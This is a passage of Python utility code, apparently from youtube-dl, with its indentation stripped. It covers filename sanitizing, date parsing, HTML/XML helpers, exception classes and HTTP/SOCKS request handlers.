# needed for sanitizing filenames in restricted mode
ACCENT_CHARS = dict(zip('ÂÃÄÀÁÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖŐØŒÙÚÛÜŰÝÞßàáâãäåæçèéêëìíîïðñòóôõöőøœùúûüűýþÿ',
itertools.chain('AAAAAA', ['AE'], 'CEEEEIIIIDNOOOOOOO', ['OE'], 'UUUUUYP', ['ss'],
'aaaaaa', ['ae'], 'ceeeeiiiionooooooo', ['oe'], 'uuuuuypy')))
DATE_FORMATS = (
'%d %B %Y',
'%d %b %Y',
'%B %d %Y',
'%b %d %Y',
'%b %dst %Y %I:%M',
'%b %dnd %Y %I:%M',
'%b %dth %Y %I:%M',
'%Y %m %d',
'%Y-%m-%d',
'%Y/%m/%d',
'%Y/%m/%d %H:%M:%S',
'%Y-%m-%d %H:%M:%S',
'%Y-%m-%d %H:%M:%S.%f',
'%d.%m.%Y %H:%M',
'%d.%m.%Y %H.%M',
'%Y-%m-%dT%H:%M:%SZ',
'%Y-%m-%dT%H:%M:%S.%fZ',
'%Y-%m-%dT%H:%M:%S.%f0Z',
'%Y-%m-%dT%H:%M:%S',
'%Y-%m-%dT%H:%M:%S.%f',
'%Y-%m-%dT%H:%M',
)
DATE_FORMATS_DAY_FIRST = list(DATE_FORMATS)
DATE_FORMATS_DAY_FIRST.extend([
'%d-%m-%Y',
'%d.%m.%Y',
'%d.%m.%y',
'%d/%m/%Y',
'%d/%m/%y',
'%d/%m/%Y %H:%M:%S',
])
DATE_FORMATS_MONTH_FIRST = list(DATE_FORMATS)
DATE_FORMATS_MONTH_FIRST.extend([
'%m-%d-%Y',
'%m.%d.%Y',
'%m/%d/%Y',
'%m/%d/%y',
'%m/%d/%Y %H:%M:%S',
])
def preferredencoding():
"""Get preferred encoding.
Returns the best encoding scheme for the system, based on
locale.getpreferredencoding() and some further tweaks.
"""
try:
pref = locale.getpreferredencoding()
'TEST'.encode(pref)
except Exception:
pref = 'UTF-8'
return pref
def write_json_file(obj, fn):
""" Encode obj as JSON and write it to fn, atomically if possible """
fn = encodeFilename(fn)
if sys.version_info < (3, 0) and sys.platform != 'win32':
encoding = get_filesystem_encoding()
# os.path.basename returns a bytes object, but NamedTemporaryFile
# will fail if the filename contains non ascii characters unless we
# use a unicode object
path_basename = lambda f: os.path.basename(fn).decode(encoding)
# the same for os.path.dirname
path_dirname = lambda f: os.path.dirname(fn).decode(encoding)
else:
path_basename = os.path.basename
path_dirname = os.path.dirname
args = {
'suffix': '.tmp',
'prefix': path_basename(fn) + '.',
'dir': path_dirname(fn),
'delete': False,
}
# In Python 2.x, json.dump expects a bytestream.
# In Python 3.x, it writes to a character stream
if sys.version_info < (3, 0):
args['mode'] = 'wb'
else:
args.update({
'mode': 'w',
'encoding': 'utf-8',
})
tf = tempfile.NamedTemporaryFile(**compat_kwargs(args))
try:
with tf:
json.dump(obj, tf)
if sys.platform == 'win32':
# Need to remove existing file on Windows, else os.rename raises
# WindowsError or FileExistsError.
try:
os.unlink(fn)
except OSError:
pass
os.rename(tf.name, fn)
except Exception:
try:
os.remove(tf.name)
except OSError:
pass
raise
if sys.version_info >= (2, 7):
def find_xpath_attr(node, xpath, key, val=None):
""" Find the xpath xpath[@key=val] """
assert re.match(r'^[a-zA-Z_-]+$', key)
expr = xpath + ('[@%s]' % key if val is None else "[@%s='%s']" % (key, val))
return node.find(expr)
else:
def find_xpath_attr(node, xpath, key, val=None):
for f in node.findall(compat_xpath(xpath)):
if key not in f.attrib:
continue
if val is None or f.attrib.get(key) == val:
return f
return None
# On python2.6 the xml.etree.ElementTree.Element methods don't support
# the namespace parameter
def xpath_with_ns(path, ns_map):
components = [c.split(':') for c in path.split('/')]
replaced = []
for c in components:
if len(c) == 1:
replaced.append(c[0])
else:
ns, tag = c
replaced.append('{%s}%s' % (ns_map[ns], tag))
return '/'.join(replaced)
def xpath_element(node, xpath, name=None, fatal=False, default=NO_DEFAULT):
def _find_xpath(xpath):
return node.find(compat_xpath(xpath))
if isinstance(xpath, (str, compat_str)):
n = _find_xpath(xpath)
else:
for xp in xpath:
n = _find_xpath(xp)
if n is not None:
break
if n is None:
if default is not NO_DEFAULT:
return default
elif fatal:
name = xpath if name is None else name
raise ExtractorError('Could not find XML element %s' % name)
else:
return None
return n
def xpath_text(node, xpath, name=None, fatal=False, default=NO_DEFAULT):
n = xpath_element(node, xpath, name, fatal=fatal, default=default)
if n is None or n == default:
return n
if n.text is None:
if default is not NO_DEFAULT:
return default
elif fatal:
name = xpath if name is None else name
raise ExtractorError('Could not find XML element\'s text %s' % name)
else:
return None
return n.text
def xpath_attr(node, xpath, key, name=None, fatal=False, default=NO_DEFAULT):
n = find_xpath_attr(node, xpath, key)
if n is None:
if default is not NO_DEFAULT:
return default
elif fatal:
name = '%s[@%s]' % (xpath, key) if name is None else name
raise ExtractorError('Could not find XML attribute %s' % name)
else:
return None
return n.attrib[key]
def get_element_by_id(id, html):
"""Return the content of the tag with the specified ID in the passed HTML document"""
return get_element_by_attribute('id', id, html)
def get_element_by_class(class_name, html):
return get_element_by_attribute(
'class', r'[^\'"]*\b%s\b[^\'"]*' % re.escape(class_name),
html, escape_value=False)
def get_element_by_attribute(attribute, value, html, escape_value=True):
"""Return the content of the tag with the specified attribute in the passed HTML document"""
value = re.escape(value) if escape_value else value
m = re.search(r'''(?xs)
<([a-zA-Z0-9:._-]+)
(?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'))*?
\s+%s=['"]?%s['"]?
(?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'))*?
\s*>
(?P<content>.*?)
</\1>
''' % (re.escape(attribute), value), html)
if not m:
return None
res = m.group('content')
if res.startswith('"') or res.startswith("'"):
res = res[1:-1]
return unescapeHTML(res)
class HTMLAttributeParser(compat_HTMLParser):
"""Trivial HTML parser to gather the attributes for a single element"""
def __init__(self):
self.attrs = {}
compat_HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
self.attrs = dict(attrs)
def extract_attributes(html_element):
"""Given a string for an HTML element such as
<el
a="foo" B="bar" c="&98;az" d=boz
empty= noval entity="&"
sq='"' dq="'"
>
Decode and return a dictionary of attributes.
{
'a': 'foo', 'b': 'bar', c: 'baz', d: 'boz',
'empty': '', 'noval': None, 'entity': '&',
'sq': '"', 'dq': '\''
}.
NB HTMLParser is stricter in Python 2.6 & 3.2 than in later versions,
but the cases in the unit test will work for all of 2.6, 2.7, 3.2-3.5.
"""
parser = HTMLAttributeParser()
parser.feed(html_element)
parser.close()
return parser.attrs
def clean_html(html):
"""Clean an HTML snippet into a readable string"""
if html is None: # Convenience for sanitizing descriptions etc.
return html
# Newline vs <br />
html = html.replace('\n', ' ')
html = re.sub(r'\s*<\s*br\s*/?\s*>\s*', '\n', html)
html = re.sub(r'<\s*/\s*p\s*>\s*<\s*p[^>]*>', '\n', html)
# Strip html tags
html = re.sub('<.*?>', '', html)
# Replace html entities
html = unescapeHTML(html)
return html.strip()
def sanitize_open(filename, open_mode):
"""Try to open the given filename, and slightly tweak it if this fails.
Attempts to open the given filename. If this fails, it tries to change
the filename slightly, step by step, until it's either able to open it
or it fails and raises a final exception, like the standard open()
function.
It returns the tuple (stream, definitive_file_name).
"""
try:
if filename == '-':
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
return (sys.stdout.buffer if hasattr(sys.stdout, 'buffer') else sys.stdout, filename)
stream = open(encodeFilename(filename), open_mode)
return (stream, filename)
except (IOError, OSError) as err:
if err.errno in (errno.EACCES,):
raise
# In case of error, try to remove win32 forbidden chars
alt_filename = sanitize_path(filename)
if alt_filename == filename:
raise
else:
# An exception here should be caught in the caller
stream = open(encodeFilename(alt_filename), open_mode)
return (stream, alt_filename)
def timeconvert(timestr):
"""Convert RFC 2822 defined time string into system timestamp"""
timestamp = None
timetuple = email.utils.parsedate_tz(timestr)
if timetuple is not None:
timestamp = email.utils.mktime_tz(timetuple)
return timestamp
def sanitize_filename(s, restricted=False, is_id=False):
"""Sanitizes a string so it could be used as part of a filename.
If restricted is set, use a stricter subset of allowed characters.
Set is_id if this is not an arbitrary string, but an ID that should be kept if possible
"""
def replace_insane(char):
if restricted and char in ACCENT_CHARS:
return ACCENT_CHARS[char]
if char == '?' or ord(char) < 32 or ord(char) == 127:
return ''
elif char == '"':
return '' if restricted else '\''
elif char == ':':
return '_-' if restricted else ' -'
elif char in '\\/|*<>':
return '_'
if restricted and (char in '!&\'()[]{}$;`^,#' or char.isspace()):
return '_'
if restricted and ord(char) > 127:
return '_'
return char
# Handle timestamps
s = re.sub(r'[0-9]+(?::[0-9]+)+', lambda m: m.group(0).replace(':', '_'), s)
result = ''.join(map(replace_insane, s))
if not is_id:
while '__' in result:
result = result.replace('__', '_')
result = result.strip('_')
# Common case of "Foreign band name - English song title"
if restricted and result.startswith('-_'):
result = result[2:]
if result.startswith('-'):
result = '_' + result[len('-'):]
result = result.lstrip('.')
if not result:
result = '_'
return result
def sanitize_path(s):
"""Sanitizes and normalizes path on Windows"""
if sys.platform != 'win32':
return s
drive_or_unc, _ = os.path.splitdrive(s)
if sys.version_info < (2, 7) and not drive_or_unc:
drive_or_unc, _ = os.path.splitunc(s)
norm_path = os.path.normpath(remove_start(s, drive_or_unc)).split(os.path.sep)
if drive_or_unc:
norm_path.pop(0)
sanitized_path = [
path_part if path_part in ['.', '..'] else re.sub('(?:[/<>:"\\|\\\\?\\*]|[\s.]$)', '#', path_part)
for path_part in norm_path]
if drive_or_unc:
sanitized_path.insert(0, drive_or_unc + os.path.sep)
return os.path.join(*sanitized_path)
# Prepend protocol-less URLs with `http:` scheme in order to mitigate the number of
# unwanted failures due to missing protocol
def sanitize_url(url):
return 'http:%s' % url if url.startswith('//') else url
def sanitized_Request(url, *args, **kwargs):
return compat_urllib_request.Request(sanitize_url(url), *args, **kwargs)
def orderedSet(iterable):
""" Remove all duplicates from the input iterable """
res = []
for el in iterable:
if el not in res:
res.append(el)
return res
def _htmlentity_transform(entity_with_semicolon):
"""Transforms an HTML entity to a character."""
entity = entity_with_semicolon[:-1]
# Known non-numeric HTML entity
if entity in compat_html_entities.name2codepoint:
return compat_chr(compat_html_entities.name2codepoint[entity])
# TODO: HTML5 allows entities without a semicolon. For example,
# 'Éric' should be decoded as 'Éric'.
if entity_with_semicolon in compat_html_entities_html5:
return compat_html_entities_html5[entity_with_semicolon]
mobj = re.match(r'#(x[0-9a-fA-F]+|[0-9]+)', entity)
if mobj is not None:
numstr = mobj.group(1)
if numstr.startswith('x'):
base = 16
numstr = '0%s' % numstr
else:
base = 10
# See https://github.com/rg3/youtube-dl/issues/7518
try:
return compat_chr(int(numstr, base))
except ValueError:
pass
# Unknown entity in name, return its literal representation
return '&%s;' % entity
def unescapeHTML(s):
if s is None:
return None
assert type(s) == compat_str
return re.sub(
r'&([^;]+;)', lambda m: _htmlentity_transform(m.group(1)), s)
def get_subprocess_encoding():
if sys.platform == 'win32' and sys.getwindowsversion()[0] >= 5:
# For subprocess calls, encode with locale encoding
# Refer to http://stackoverflow.com/a/9951851/35070
encoding = preferredencoding()
else:
encoding = sys.getfilesystemencoding()
if encoding is None:
encoding = 'utf-8'
return encoding
def encodeFilename(s, for_subprocess=False):
"""
@param s The name of the file
"""
assert type(s) == compat_str
# Python 3 has a Unicode API
if sys.version_info >= (3, 0):
return s
# Pass '' directly to use Unicode APIs on Windows 2000 and up
# (Detecting Windows NT 4 is tricky because 'major >= 4' would
# match Windows 9x series as well. Besides, NT 4 is obsolete.)
if not for_subprocess and sys.platform == 'win32' and sys.getwindowsversion()[0] >= 5:
return s
# Jython assumes filenames are Unicode strings though reported as Python 2.x compatible
if sys.platform.startswith('java'):
return s
return s.encode(get_subprocess_encoding(), 'ignore')
def decodeFilename(b, for_subprocess=False):
if sys.version_info >= (3, 0):
return b
if not isinstance(b, bytes):
return b
return b.decode(get_subprocess_encoding(), 'ignore')
def encodeArgument(s):
if not isinstance(s, compat_str):
# Legacy code that uses byte strings
# Uncomment the following line after fixing all post processors
# assert False, 'Internal error: %r should be of type %r, is %r' % (s, compat_str, type(s))
s = s.decode('ascii')
return encodeFilename(s, True)
def decodeArgument(b):
return decodeFilename(b, True)
def decodeOption(optval):
if optval is None:
return optval
if isinstance(optval, bytes):
optval = optval.decode(preferredencoding())
assert isinstance(optval, compat_str)
return optval
def formatSeconds(secs):
if secs > 3600:
return '%d:%02d:%02d' % (secs // 3600, (secs % 3600) // 60, secs % 60)
elif secs > 60:
return '%d:%02d' % (secs // 60, secs % 60)
else:
return '%d' % secs
def make_HTTPS_handler(params, **kwargs):
opts_no_check_certificate = params.get('nocheckcertificate', False)
if hasattr(ssl, 'create_default_context'): # Python >= 3.4 or 2.7.9
context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
if opts_no_check_certificate:
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
try:
return YoutubeDLHTTPSHandler(params, context=context, **kwargs)
except TypeError:
# Python 2.7.8
# (create_default_context present but HTTPSHandler has no context=)
pass
if sys.version_info < (3, 2):
return YoutubeDLHTTPSHandler(params, **kwargs)
else: # Python < 3.4
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = (ssl.CERT_NONE
if opts_no_check_certificate
else ssl.CERT_REQUIRED)
context.set_default_verify_paths()
return YoutubeDLHTTPSHandler(params, context=context, **kwargs)
def bug_reports_message():
if ytdl_is_updateable():
update_cmd = 'type youtube-dl -U to update'
else:
update_cmd = 'see https://yt-dl.org/update on how to update'
msg = '; please report this issue on https://yt-dl.org/bug .'
msg += ' Make sure you are using the latest version; %s.' % update_cmd
msg += ' Be sure to call youtube-dl with the --verbose flag and include its complete output.'
return msg
class ExtractorError(Exception):
"""Error during info extraction."""
def __init__(self, msg, tb=None, expected=False, cause=None, video_id=None):
""" tb, if given, is the original traceback (so that it can be printed out).
If expected is set, this is a normal error message and most likely not a bug in youtube-dl.
"""
if sys.exc_info()[0] in (compat_urllib_error.URLError, socket.timeout, UnavailableVideoError):
expected = True
if video_id is not None:
msg = video_id + ': ' + msg
if cause:
msg += ' (caused by %r)' % cause
if not expected:
msg += bug_reports_message()
super(ExtractorError, self).__init__(msg)
self.traceback = tb
self.exc_info = sys.exc_info() # preserve original exception
self.cause = cause
self.video_id = video_id
def format_traceback(self):
if self.traceback is None:
return None
return ''.join(traceback.format_tb(self.traceback))
class UnsupportedError(ExtractorError):
def __init__(self, url):
super(UnsupportedError, self).__init__(
'Unsupported URL: %s' % url, expected=True)
self.url = url
class RegexNotFoundError(ExtractorError):
"""Error when a regex didn't match"""
pass
class DownloadError(Exception):
"""Download Error exception.
This exception may be thrown by FileDownloader objects if they are not
configured to continue on errors. They will contain the appropriate
error message.
"""
def __init__(self, msg, exc_info=None):
""" exc_info, if given, is the original exception that caused the trouble (as returned by sys.exc_info()). """
super(DownloadError, self).__init__(msg)
self.exc_info = exc_info
class SameFileError(Exception):
"""Same File exception.
This exception will be thrown by FileDownloader objects if they detect
multiple files would have to be downloaded to the same file on disk.
"""
pass
class PostProcessingError(Exception):
"""Post Processing exception.
This exception may be raised by PostProcessor's .run() method to
indicate an error in the postprocessing task.
"""
def __init__(self, msg):
self.msg = msg
class MaxDownloadsReached(Exception):
""" --max-downloads limit has been reached. """
pass
class UnavailableVideoError(Exception):
"""Unavailable Format exception.
This exception will be thrown when a video is requested
in a format that is not available for that video.
"""
pass
class ContentTooShortError(Exception):
"""Content Too Short exception.
This exception may be raised by FileDownloader objects when a file they
download is too small for what the server announced first, indicating
the connection was probably interrupted.
"""
def __init__(self, downloaded, expected):
# Both in bytes
self.downloaded = downloaded
self.expected = expected
def _create_http_connection(ydl_handler, http_class, is_https, *args, **kwargs):
# Working around python 2 bug (see http://bugs.python.org/issue17849) by limiting
# expected HTTP responses to meet HTTP/1.0 or later (see also
# https://github.com/rg3/youtube-dl/issues/6727)
if sys.version_info < (3, 0):
kwargs[b'strict'] = True
hc = http_class(*args, **kwargs)
source_address = ydl_handler._params.get('source_address')
if source_address is not None:
sa = (source_address, 0)
if hasattr(hc, 'source_address'): # Python 2.7+
hc.source_address = sa
else: # Python 2.6
def _hc_connect(self, *args, **kwargs):
sock = compat_socket_create_connection(
(self.host, self.port), self.timeout, sa)
if is_https:
self.sock = ssl.wrap_socket(
sock, self.key_file, self.cert_file,
ssl_version=ssl.PROTOCOL_TLSv1)
else:
self.sock = sock
hc.connect = functools.partial(_hc_connect, hc)
return hc
def handle_youtubedl_headers(headers):
filtered_headers = headers
if 'Youtubedl-no-compression' in filtered_headers:
filtered_headers = dict((k, v) for k, v in filtered_headers.items() if k.lower() != 'accept-encoding')
del filtered_headers['Youtubedl-no-compression']
return filtered_headers
class YoutubeDLHandler(compat_urllib_request.HTTPHandler):
"""Handler for HTTP requests and responses.
This class, when installed with an OpenerDirector, automatically adds
the standard headers to every HTTP request and handles gzipped and
deflated responses from web servers. If compression is to be avoided in
a particular request, the original request in the program code only has
to include the HTTP header "Youtubedl-no-compression", which will be
removed before making the real request.
Part of this code was copied from:
http://techknack.net/python-urllib2-handlers/
Andrew Rowls, the author of that code, agreed to release it to the
public domain.
"""
def __init__(self, params, *args, **kwargs):
compat_urllib_request.HTTPHandler.__init__(self, *args, **kwargs)
self._params = params
def http_open(self, req):
conn_class = compat_http_client.HTTPConnection
socks_proxy = req.headers.get('Ytdl-socks-proxy')
if socks_proxy:
conn_class = make_socks_conn_class(conn_class, socks_proxy)
del req.headers['Ytdl-socks-proxy']
return self.do_open(functools.partial(
_create_http_connection, self, conn_class, False),
req)
@staticmethod
def deflate(data):
try:
return zlib.decompress(data, -zlib.MAX_WBITS)
except zlib.error:
return zlib.decompress(data)
@staticmethod
def addinfourl_wrapper(stream, headers, url, code):
if hasattr(compat_urllib_request.addinfourl, 'getcode'):
return compat_urllib_request.addinfourl(stream, headers, url, code)
ret = compat_urllib_request.addinfourl(stream, headers, url)
ret.code = code
return ret
def http_request(self, req):
# According to RFC 3986, URLs can not contain non-ASCII characters, however this is not
# always respected by websites, some tend to give out URLs with non percent-encoded
# non-ASCII characters (see telemb.py, ard.py [#3412])
# urllib chokes on URLs with non-ASCII characters (see http://bugs.python.org/issue3991)
# To work around aforementioned issue we will replace request's original URL with
# percent-encoded one
# Since redirects are also affected (e.g. http://www.southpark.de/alle-episoden/s18e09)
# the code of this workaround has been moved here from YoutubeDL.urlopen()
url = req.get_full_url()
url_escaped = escape_url(url)
# Substitute URL if any change after escaping
if url != url_escaped:
req = update_Request(req, url=url_escaped)
for h, v in std_headers.items():
# Capitalize is needed because of Python bug 2275: http://bugs.python.org/issue2275
# The dict keys are capitalized because of this bug by urllib
if h.capitalize() not in req.headers:
req.add_header(h, v)
req.headers = handle_youtubedl_headers(req.headers)
if sys.version_info < (2, 7) and '#' in req.get_full_url():
# Python 2.6 is brain-dead when it comes to fragments
req._Request__original = req._Request__original.partition('#')[0]
req._Request__r_type = req._Request__r_type.partition('#')[0]
return req
def http_response(self, req, resp):
old_resp = resp
# gzip
if resp.headers.get('Content-encoding', '') == 'gzip':
content = resp.read()
gz = gzip.GzipFile(fileobj=io.BytesIO(content), mode='rb')
try:
uncompressed = io.BytesIO(gz.read())
except IOError as original_ioerror:
# There may be junk add the end of the file
# See http://stackoverflow.com/q/4928560/35070 for details
for i in range(1, 1024):
try:
gz = gzip.GzipFile(fileobj=io.BytesIO(content[:-i]), mode='rb')
uncompressed = io.BytesIO(gz.read())
except IOError:
continue
break
else:
raise original_ioerror
resp = self.addinfourl_wrapper(uncompressed, old_resp.headers, old_resp.url, old_resp.code)
resp.msg = old_resp.msg
del resp.headers['Content-encoding']
# deflate
if resp.headers.get('Content-encoding', '') == 'deflate':
gz = io.BytesIO(self.deflate(resp.read()))
resp = self.addinfourl_wrapper(gz, old_resp.headers, old_resp.url, old_resp.code)
resp.msg = old_resp.msg
del resp.headers['Content-encoding']
# Percent-encode redirect URL of Location HTTP header to satisfy RFC 3986 (see
# https://github.com/rg3/youtube-dl/issues/6457).
if 300 <= resp.code < 400:
location = resp.headers.get('Location')
if location:
# As of RFC 2616 default charset is iso-8859-1 that is respected by python 3
if sys.version_info >= (3, 0):
location = location.encode('iso-8859-1').decode('utf-8')
else:
location = location.decode('utf-8')
location_escaped = escape_url(location)
if location != location_escaped:
del resp.headers['Location']
if sys.version_info < (3, 0):
location_escaped = location_escaped.encode('utf-8')
resp.headers['Location'] = location_escaped
return resp
https_request = http_request
https_response = http_response
def make_socks_conn_class(base_class, socks_proxy):
assert issubclass(base_class, (
compat_http_client.HTTPConnection, compat_http_client.HTTPSConnection))
url_components = compat_urlparse.urlparse(socks_proxy)
if url_components.scheme.lower() == 'socks5':
socks_type = ProxyType.SOCKS5
elif url_components.scheme.lower() in ('socks', 'socks4'):
socks_type = ProxyType.SOCKS4
elif url_components.scheme.lower() == 'socks4a':
socks_type = ProxyType.SOCKS4A
def unquote_if_non_empty(s):
if not s:
return s
return compat_urllib_parse_unquote_plus(s)
proxy_args = (
socks_type,
url_components.hostname, url_components.port or 1080,
True, # Remote DNS
unquote_if_non_empty(url_components.username),
unquote_if_non_empty(url_components.password),
)
class SocksConnection(base_class):
def connect(self):
self.sock = sockssocket()
self.sock.setproxy(*proxy_args)
if type(self.timeout) in (int, float):
self.sock.settimeout(self.timeout)
self.sock.connect((self.host, self.port))
if isinstance(self, compat_http_client.HTTPSConnection):
if hasattr(self, '_context'): # Python > 2.6
self.sock = self._context.wrap_socket(
self.sock, server_hostname=self.host)
else:
self.sock = ssl.wrap_socket(self.sock)
return SocksConnection
class YoutubeDLHTTPSHandler(compat_urllib_request.HTTPSHandler):
def __init__(self, params, https_conn_class=None, *args, **kwargs):
compat_urllib_request.HTTPSHandler.__init__(self, *args, **kwargs)
self._https_conn_class = https_conn_class or compat_http_client.HTTPSConnection
self._params = params
def https_open(self, req):
kwargs = {}
conn_class = self._https_conn_class
if hasattr(self, '_context'): # python > 2.6
kwargs['context'] = self._context
if hasattr(self, '_check_hostname'): # python 3.x
kwargs['check_hostname'] = self._check_hostname
socks_proxy = req.headers.get('Ytdl-socks-proxy')
if socks_proxy:
conn_class = make_socks_conn_class(conn_class, socks_proxy)
del req.headers['Ytdl-socks-proxy']
return self.do_open(functools.partial(
_create_http_connection, self, conn_class, True),
req, **kwargs)
class YoutubeDLCookieProcessor(compat_urllib_request.HTTPCookieProcessor):
def __init__(self, cookiejar=None):
compat_urllib_request.HTTPCookieProcessor.__init__(self, cookiejar)
def http_response(self, request, response):
# Python 2 will choke on next HTTP request in row if there are non-ASCII
# characters in Set-Cookie HTTP header of last response (see
# https://github.com/rg3/youtube-dl/issues/6769).
# In order to at least prevent crashing we will percent encode Set-Cookie
# header before HTTPCookieProcessor starts processing it.
# if sys.version_info < (3, 0) and response.headers:
# for set_cookie_header in ('Set-Cookie', 'Set-Cookie2'):
# set_cookie = response.headers.get(set_cookie_header)
# if set_cookie:
# set_cookie_escaped = compat_urllib_parse.quote(set_cookie, b"%/;:@&=+$,!~*'()?#[] ")
# if set_cookie != set_cookie_escaped:
# del response.headers[set_cookie_header]
# response.headers[set_cookie_header] = set_cookie_escaped
return compat_urllib_request.HTTPCookieProcessor.http_response(self, request, response)
https_request = compat_urllib_request.HTTPCookieProcessor.http_request
https_response = http_response
def extract_timezone(date_str):
m = re.search(
r'^.{8,}?(?P<tz>Z$| ?(?P<sign>\+|-)(?P<hours>[0-9]{2}):?(?P<minutes>[0-9]{2})$)',
date_str)
if not m:
timezone = datetime.timedelta()
else:
date_str = date_str[:-len(m.group('tz'))]
if not m.group('sign'):
timezone = datetime.timedelta()
else:
sign = 1 if m.group('sign') == '+' else -1
timezone = datetime.timedelta(
hours=sign * int(m.group('hours')),
minutes=sign * int(m.group('minutes')))
return timezone, date_str
def parse_iso8601(date_str, delimiter='T', timezone=None):
""" Return a UNIX timestamp from the given date """
if date_str is None:
return None
date_str = re.sub(r'\.[0-9]+', '', date_str)
if timezone is None:
timezone, date_str = extract_timezone(date_str)
try:
date_format = '%Y-%m-%d{0}%H:%M:%S'.format(delimiter)
dt = datetime.datetime.strptime(date_str, date_format) - timezone
return calendar.timegm(dt.timetuple())
except ValueError:
pass
def date_formats(day_first=True):
return DATE_FORMATS_DAY_FIRST if day_first else DATE_FORMATS_MONTH_FIRST
def unified_strdate(date_str, day_first=True):
"""Return a string with the date in the format YYYYMMDD"""
if date_str is None:
return None
upload_date = None
# Replace commas
date_str = date_str.replace(',', ' ')
# Remove AM/PM + timezone
date_str = re.sub(r'(?i)\s*(?:AM|PM)(?:\s+[A-Z]+)?', '', date_str)
_, date_str = extract_timezone(date_str)
for expression in date_formats(day_first):
try:
upload_date = datetime.datetime.strptime(date_str, expression).strftime('%Y%m%d')
except ValueError:
pass
if upload_date is None:
timetuple = email.utils.parsedate_tz(date_str)
if timetuple:
try:
upload_date = datetime.datetime(*timetuple[:6]).strftime('%Y%m%d')
except ValueError:
pass
if upload_date is not None:
return compat_str(upload_date)
def unified_timestamp(date_str, day_first=True):
if date_str is None:
return None
date_str = date_str.replace(',', ' ')
pm_delta = datetime.timedelta(hours=12 if re.search(r'(?i)PM', date_str) else 0)
timezone, date_str = extract_timezone(date_str)
# Remove AM/PM + timezone
date_str = re.sub(r'(?i)\s*(?:AM|PM)(?:\s+[A-Z]+)?', '', date_str)
for expression in date_formats(day_first):
try:
dt = datetime.datetime.strptime(date_str, expression) - timezone + pm_delta
return calendar.timegm(dt.timetuple())
except ValueError:
pass
timetuple = email.utils.parsedate_tz(date_str)
if timetuple:
return calendar.timegm(timetuple.timetuple())
def determine_ext(url, default_ext='unknown_video'):
if url is None:
return default_ext
guess = url.partition('?')[0].rpartition('.')[2]
if re.match(r'^[A-Za-z0-9]+$', guess):
return guess
# Try extract ext from URLs like http://example.com/foo/bar.mp4/?download
elif guess.rstrip('/') in KNOWN_EXTENSIONS:
return guess.rstrip('/')
else:
return default_ext
def subtitles_filename(filename, sub_lang, sub_format):
return filename.rsplit('.', 1)[0] + '.' + sub_lang + '.' + sub_format
def date_from_str(date_str):
"""
Return a datetime object from a string in the format YYYYMMDD or
(now|today)[+-][0-9](day|week|month|year)(s)?"""
today = datetime.date.today()
if date_str in ('now', 'today'):
return today
if date_str == 'yesterday':
return today - datetime.timedelta(days=1)
match = re.match('(now|today)(?P<sign>[+-])(?P<time>\d+)(?P<unit>day|week|month|year)(s)?', date_str)
if match is not None:
sign = match.group('sign')
time = int(match.group('time'))
if sign == '-':
time = -time
unit = match.group('unit')
# A bad approximation?
if unit == 'month':
unit = 'day'
time *= 30
elif unit == 'year':
unit = 'day'
time *= 365
unit += 's'
delta = datetime.timedelta(**{unit: time})
return today + delta
return datetime.datetime.strptime(date_str, '%Y%m%d').date()
def hyphenate_date(date_str):
"""
Convert a date in 'YYYYMMDD' format to 'YYYY-MM-DD' format"""
match = re.match(r'^(\d\d\d\d)(\d\d)(\d\d)$', date_str)
if match is not None:
return '-'.join(match.groups())
else:
return date_str
class DateRange(object):
"""Represents a time interval between two dates"""
def __init__(self, start=None, end=None):
"""start and end must be strings in the format accepted by date"""
if start is not None:
self.start = date_from_str(start)
else:
self.start = datetime.datetime.min.date()
if end is not None:
self.end = date_from_str(end)
else:
self.end = datetime.datetime.max.date()
if self.start > self.end:
raise ValueError('Date range: "%s" , the start date must be before the end date' % self)
@classmethod
def day(cls, day):
"""Returns a range that only contains the given day"""
return cls(day, day)
def __contains__(self, date):
"""Check if the date is in the range"""
if not isinstance(date, datetime.date):
date = date_from_str(date)
return self.start <= date <= self.end
def __str__(self):
return '%s - %s' % (self.start.isoformat(), self.end.isoformat())
def platform_name():
""" Returns the platform name as a compat_str """
res = platform.platform()
if isinstance(res, bytes):
res = res.decode(preferredencoding())
assert isinstance(res, compat_str)
return res
def _windows_write_string(s, out):
""" Returns True if the string was written using special methods,
False if it has yet to be written out."""
# Adapted from http://stackoverflow.com/a/3259271/35070
import ctypes
import ctypes.wintypes
WIN_OUTPUT_IDS = {
1: -11,
2: -12,
}
try:
fileno = out.fileno()
except AttributeError:
# If the output stream doesn't have a fileno, it's virtual
return False
except io.UnsupportedOperation:
# Some strange Windows pseudo files?
return False
if fileno not in WIN_OUTPUT_IDS:
return False
GetStdHandle = ctypes.WINFUNCTYPE(
ctypes.wintypes.HANDLE, ctypes.wintypes.DWORD)(
(b'GetStdHandle', ctypes.windll.kernel32))
h = GetStdHandle(WIN_OUTPUT_IDS[fileno])
WriteConsoleW = ctypes.WINFUNCTYPE(
ctypes.wintypes.BOOL, ctypes.wintypes.HANDLE, ctypes.wintypes.LPWSTR,
ctypes.wintypes.DWORD, ctypes.POINTER(ctypes.wintypes.DWORD),
ctypes.wintypes.LPVOID)((b'WriteConsoleW', ctypes.windll.kernel32))
written = ctypes.wintypes.DWORD(0)
GetFileType = ctypes.WINFUNCTYPE(ctypes.wintypes.DWORD, ctypes.wintypes.DWORD)((b'GetFileType', ctypes.windll.kernel32))
FILE_TYPE_CHAR = 0x0002
FILE_TYPE_REMOTE = 0x8000
GetConsoleMode = ctypes.WINFUNCTYPE(
ctypes.wintypes.BOOL, ctypes.wintypes.HANDLE,
ctypes.POINTER(ctypes.wintypes.DWORD))(
(b'GetConsoleMode', ctypes.windll.kernel32))
INVALID_HANDLE_VALUE = ctypes.wintypes.DWORD(-1).value
def not_a_console(handle):
if handle == INVALID_HANDLE_VALUE or handle is None:
return True
return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR or
GetConsoleMode(handle, ctypes.byref(ctypes.wintypes.DWORD())) == 0)
if not_a_console(h):
return False
def next_nonbmp_pos(s):
